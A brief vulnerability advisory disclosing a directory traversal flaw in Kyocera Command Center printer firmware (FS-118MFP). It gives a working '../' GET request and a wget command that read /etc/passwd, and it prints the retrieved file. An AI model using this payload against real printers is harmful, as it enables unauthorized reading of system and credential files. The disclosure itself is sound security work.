kyocera-traversal.txt

`Kyocera Command Center Directory Traversal Vulnerability  
  
Version: I've tested this vulnerability to Kyocera Command Center embedded in FS-118MFP (system Linux embedded) printer but I suppose that other Kyocera printers may be vulnerable  
  
Vulnerability: Directory Traversal  
  
Risk: Critical  
  
Description (Wikipedia -http://en.wikipedia.org/wiki/Directory_traversal-): "A directory traversal (or path traversal) is to exploit insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.  
The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code.  
Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks"   
  
Example GET Request:  
  
GET /../../../../../../../../../etc/passwd HTTP/1.0  
  
Example file download:  
  
wget http://yourip/../../../../../../../../../etc/passwd  
cat passwd  
root::0:0:root:/root:/bin/sh  
bin:*:1:1:bin:/bin:  
daemon:*:2:2:daemon:/usr/sbin:  
sys:*:3:3:sys:/dev:  
adm:*:4:4:adm:/var/adm:  
lp:*:5:7:lp:/var/spool/lpd:  
sync:*:6:8:sync:/bin:/bin/sync  
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown  
halt:*:8:10:halt:/sbin:/sbin/halt  
mail:*:9:11:mail:/var/spool/mail:  
news:*:10:12:news:/var/spool/news:  
uucp:*:11:13:uucp:/var/spool/uucp:  
operator:*:12:0:operator:/root:  
games:*:13:100:games:/usr/games:  
ftp:*:15:14:ftp:/var/ftp:  
man:*:16:100:man:/var/cache/man:  
nobody:*:65534:65534:nobody:/home:/bin/sh  
  
Francesco Tornieri  
`